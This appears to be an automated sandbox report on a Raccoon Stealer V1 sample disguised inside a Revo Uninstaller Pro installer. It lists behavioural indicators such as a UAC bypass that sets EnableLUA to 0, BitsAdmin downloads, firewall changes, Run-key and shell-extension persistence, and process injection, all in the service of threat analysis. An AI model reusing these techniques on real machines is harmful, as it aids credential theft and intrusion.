Malware Analysis Report

2024-10-19 09:14

Sample ID 241002-r9dkeswbjd
Target 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118
SHA256 2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799
Tags
raccoon 0343d4da493d263f78921a8724ca6adf05347cfe discovery dropper evasion execution persistence privilege_escalation stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799

Threat Level: Known bad

The file 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

raccoon 0343d4da493d263f78921a8724ca6adf05347cfe discovery dropper evasion execution persistence privilege_escalation stealer trojan

Raccoon Stealer V1 payload

UAC bypass

Raccoon

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Drops file in Drivers directory

Modifies Windows Firewall

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Modifies system executable filetype association

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-02 14:53

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-02 14:53

Reported

2024-10-02 14:55

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

Signatures

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\SETC573.tmp C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\system32\DRIVERS\SETC573.tmp C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys C:\Windows\system32\rundll32.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\rundll32.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4612 set thread context of 2752 N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe C:\ProgramData\uzlyLtM20yixSdV\111.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQ2IF.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2SAH8.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M285L.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BH5TN.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-E8NN8.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-98A4K.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TMR6O.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PIF2G.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QTSI6.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T6OE0.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HESS8.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CO13.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I4R82.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KF950.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1DEPE.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8EBPQ.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-B842V.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0CNGL.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DBS9F.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11D5K.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5EJO.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I0JB7.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MGU6R.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GUGQ9.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7IFIE.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-JLN3A.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7OTPS.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MRVBA.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OOVS2.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-1OS3J.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5T18.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1AJUU.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2BPEO.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PSTB9.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RJU1.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-DIHT4.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-NNFCT.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P30VC.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5SN49.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KSQCR.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5QS7.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8SAF9.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L3SUU.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-86AVN.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LO1UR.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P9GR5.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files (x86)\is-H9BQU.tmp C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SHUNJ.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5H27N.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4JI7F.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CFCOM.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1ALQI.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BMARA.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PH91H.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7MFPL.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-00GEF.tmp C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mode.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\{305CA226-D286-468e-B848-2B2E8E697B74} 2 = "8" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ruel C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\FLAGS\ = "0" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\LocalServer32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
